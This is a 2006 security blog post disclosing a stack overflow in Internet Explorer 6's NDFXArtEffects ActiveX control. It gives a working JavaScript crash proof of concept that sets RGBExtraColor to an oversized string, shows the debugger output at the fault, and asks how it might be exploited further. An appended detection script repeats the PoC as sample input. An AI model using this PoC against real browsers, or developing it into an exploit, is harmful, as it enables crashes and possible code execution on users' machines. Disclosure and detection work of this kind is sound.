Thursday, July 27, 2006

MoBB #27: NDFXArtEffects RGBExtraColor

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. A stack overflow can occur when one of the RGBExtraColor, RGBForeColor, or RGBBackColor properties is set to a long string value. Since the entire string is placed into a stack buffer, you are able to select exactly what instruction to fault on based on the length of the string. Does anyone know of a way to exploit this for something besides a crash?

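// Build a string longer than 1 MB by repeated doubling.
var b = 'XXXX';
while (b.length <= 1024 * 1024) b += b;
// Instantiate the control and assign the first i characters to the property.
var a = new ActiveXObject('DXImageTransform.Microsoft.NDFXArtEffects.1');
var i = 1016320;
a.RGBExtraColor = b.substring(0, i);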

Demonstration

eax=4db88a05 ebx=000f8201 ecx=7c809f8a
edx=0013b274 esi=02f50024 edi=00000000
eip=4db88a11 esp=00043000 ebp=0013b254
wmm2fxb!DXColorFromBSTR+0xc8:
4db88a11 57 push edi

This bug will be added to the OSVDB:
Microsoft IE NDFXArtEffects Multiple Property Stack Overflow
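
For anyone reviewing pages or proxy captures for this pattern, a static check is sketched below as an added example; it is not part of the original post. It flags script that binds the NDFXArtEffects control to a variable and then assigns one of the three properties named above. The function names and the sample input are constructed for illustration, and matching property names case-insensitively is a conservative assumption.

```javascript
// Added example: static detection of script that instantiates the
// NDFXArtEffects control and assigns RGBExtraColor, RGBForeColor or
// RGBBackColor on it. Helper names are hypothetical.
const AFFECTED = ['RGBExtraColor', 'RGBForeColor', 'RGBBackColor'];

// Matches `x = new ActiveXObject('DXImageTransform.Microsoft.NDFXArtEffects[.N]')`
const BIND_RE = /([A-Za-z_$][\w$]*)\s*=\s*new\s+ActiveXObject\s*\(\s*(['"])DXImageTransform\.Microsoft\.NDFXArtEffects(?:\.\d+)?\2\s*\)/gi;

// 1-based line number of a character offset in the source text.
function lineOf(source, index) {
  return source.slice(0, index).split('\n').length;
}

function findNdfxColorAssignments(source) {
  // Pass 1: collect every variable name bound to the control.
  const bound = new Set();
  for (const m of source.matchAll(BIND_RE)) bound.add(m[1]);

  // Pass 2: report `name.Prop =` on those variables (not `==`, and not a
  // longer identifier or member chain that merely ends in the same name).
  const findings = [];
  for (const name of bound) {
    const escaped = name.replace(/\$/g, () => '\\$');
    const re = new RegExp(
      '(?<![\\w$.])' + escaped + '\\s*\\.\\s*(' + AFFECTED.join('|') + ')\\s*=(?!=)',
      'gi');
    for (const m of source.matchAll(re)) {
      findings.push({ variable: name, property: m[1], line: lineOf(source, m.index) });
    }
  }
  return findings.sort((x, y) => x.line - y.line);
}

// Constructed sample: the snippet from this post plus two lines that must not match.
const SAMPLE = [
  "var b = 'XXXX';",
  "while(b.length <=1024*1024) b+=b;",
  "var a = new ActiveXObject('DXImageTransform.Microsoft.NDFXArtEffects.1');",
  "var i = 1016320;",
  "a.RGBExtraColor = b.substring(0,i);",
  "if (a.RGBForeColor == 0) {}",   // comparison, not an assignment
  "data.RGBBackColor = '#fff';",   // different object
].join('\n');

console.log(findNdfxColorAssignments(SAMPLE));
```

The check is purely textual, so it misses script that builds the ProgID string at run time or reaches the control through an alias.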
